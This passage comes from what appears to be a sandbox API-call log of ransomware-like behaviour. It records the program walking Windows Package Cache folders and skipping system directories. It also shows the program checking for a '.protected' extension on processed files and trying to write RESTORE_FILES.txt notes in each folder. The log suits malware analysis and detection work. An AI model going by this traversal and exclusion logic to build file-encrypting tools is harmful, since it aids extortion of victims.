Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe.protected") returned 102 [0093.342] StrStrIW (lpFirst="vcredist_x86.exe.protected", lpSrch=".protected") returned=".protected" [0093.342] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.342] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.342] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\RESTORE_FILES.txt") returned 93 [0093.342] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.342] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.342] lstrcmpiW (lpString1="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", lpString2="Windows") returned -1 [0093.342] lstrcmpiW (lpString1="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", lpString2="Program Files") returned -1 [0093.342] lstrcmpiW (lpString1="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", lpString2="Program Files (x86)") returned -1 [0093.342] lstrcmpiW (lpString1="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", lpString2="$Recycle.bin") returned 1 [0093.342] lstrcmpiW (lpString1="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", lpString2="System Volume Information") returned -1 [0093.342] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030") returned 86 [0093.342] lstrcmpW (lpString1="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", lpString2=".") returned 1 [0093.342] lstrcmpW (lpString1="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", lpString2="..") returned 1 [0093.343] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\*") returned 88 [0093.343] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.343] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.343] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.343] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.343] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.343] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.343] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\.") returned 88 [0093.343] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.343] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.343] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.343] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.343] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.343] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.343] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.343] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\..") returned 89 [0093.343] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.343] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.343] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.343] lstrcmpiW (lpString1="packages", lpString2="Windows") returned -1 [0093.343] lstrcmpiW (lpString1="packages", lpString2="Program Files") returned -1 [0093.343] lstrcmpiW (lpString1="packages", lpString2="Program Files (x86)") returned -1 [0093.343] lstrcmpiW (lpString1="packages", lpString2="$Recycle.bin") returned 1 [0093.343] lstrcmpiW (lpString1="packages", lpString2="System Volume Information") returned -1 [0093.343] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages") returned 95 [0093.343] lstrcmpW (lpString1="packages", lpString2=".") returned 1 [0093.343] lstrcmpW (lpString1="packages", lpString2="..") returned 1 [0093.344] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\*") returned 97 [0093.344] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.344] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.344] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.344] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.344] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.344] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\.") returned 97 [0093.344] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.344] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.344] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\..") returned 98 [0093.344] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.344] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.344] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.344] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\RESTORE_FILES.txt") returned 113 [0093.344] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.344] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.344] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.344] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64") returned 121 [0093.344] lstrcmpW (lpString1="vcRuntimeAdditional_amd64", lpString2=".") returned 1 [0093.344] lstrcmpW (lpString1="vcRuntimeAdditional_amd64", lpString2="..") returned 1 [0093.345] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\*") returned 123 [0093.345] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.345] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\.") returned 123 [0093.345] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.345] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.345] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\..") returned 124 [0093.345] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.345] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.345] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.345] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.protected") returned 140 [0093.345] StrStrIW (lpFirst="cab1.cab.protected", lpSrch=".protected") returned=".protected" [0093.345] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.345] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\RESTORE_FILES.txt") returned 139 [0093.345] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.345] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.345] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.345] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.protected") returned 160 [0093.345] StrStrIW (lpFirst="vc_runtimeAdditional_x64.msi.protected", lpSrch=".protected") returned=".protected" [0093.345] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.345] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.345] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\RESTORE_FILES.txt") returned 139 [0093.345] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.346] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.346] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.346] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\RESTORE_FILES.txt") returned 113 [0093.346] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.347] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.347] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\RESTORE_FILES.txt") returned 104 [0093.347] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.347] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.347] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.347] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.347] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\RESTORE_FILES.txt") returned 104 [0093.347] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.348] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.348] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}") returned 75 [0093.348] lstrcmpW (lpString1="{3c3aafc8-d898-43ec-998f-965ffdae065a}", lpString2=".") returned 1 [0093.348] lstrcmpW (lpString1="{3c3aafc8-d898-43ec-998f-965ffdae065a}", lpString2="..") returned 1 [0093.348] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\*") returned 77 [0093.348] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.348] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\.") returned 77 [0093.348] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.348] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.348] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\..") returned 78 [0093.348] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.348] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.348] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.348] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\RESTORE_FILES.txt") returned 93 [0093.349] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.349] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.349] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.349] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm.protected") returned 95 [0093.349] StrStrIW (lpFirst="state.rsm.protected", lpSrch=".protected") returned=".protected" [0093.349] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.349] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe.protected") returned 102 [0093.349] StrStrIW (lpFirst="vcredist_x64.exe.protected", lpSrch=".protected") returned=".protected" [0093.349] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.349] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.349] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\RESTORE_FILES.txt") returned 93 [0093.349] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.349] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.349] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017") returned 87 [0093.349] lstrcmpW (lpString1="{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017", lpString2=".") returned 1 [0093.349] lstrcmpW (lpString1="{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017", lpString2="..") returned 1 [0093.349] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\*") returned 89 [0093.349] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.349] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\.") returned 89 [0093.349] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.349] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.349] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\..") returned 90 [0093.349] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.349] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.349] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.349] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages") returned 96 [0093.349] lstrcmpW (lpString1="packages", lpString2=".") returned 1 [0093.349] lstrcmpW (lpString1="packages", lpString2="..") returned 1 [0093.350] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\*") returned 98 [0093.350] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.350] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\.") returned 98 [0093.350] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.350] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.350] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\..") returned 99 [0093.350] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.350] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.350] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.350] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\RESTORE_FILES.txt") returned 114 [0093.350] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.350] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.350] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.350] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86") returned 117 [0093.350] lstrcmpW (lpString1="vcRuntimeMinimum_x86", lpString2=".") returned 1 [0093.350] lstrcmpW (lpString1="vcRuntimeMinimum_x86", lpString2="..") returned 1 [0093.351] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\*") returned 119 [0093.351] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.351] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\.") returned 119 [0093.351] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.351] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.351] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\..") returned 120 [0093.351] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.351] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.351] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.351] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab.protected") returned 136 [0093.351] StrStrIW (lpFirst="cab1.cab.protected", lpSrch=".protected") returned=".protected" [0093.351] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.351] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\RESTORE_FILES.txt") returned 135 [0093.351] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.351] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.351] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.351] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.protected") returned 153 [0093.351] StrStrIW (lpFirst="vc_runtimeMinimum_x86.msi.protected", lpSrch=".protected") returned=".protected" [0093.351] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.351] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.351] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\RESTORE_FILES.txt") returned 135 [0093.351] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.351] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.351] FindClose (in: hFindFile=0x47ba10 | out: 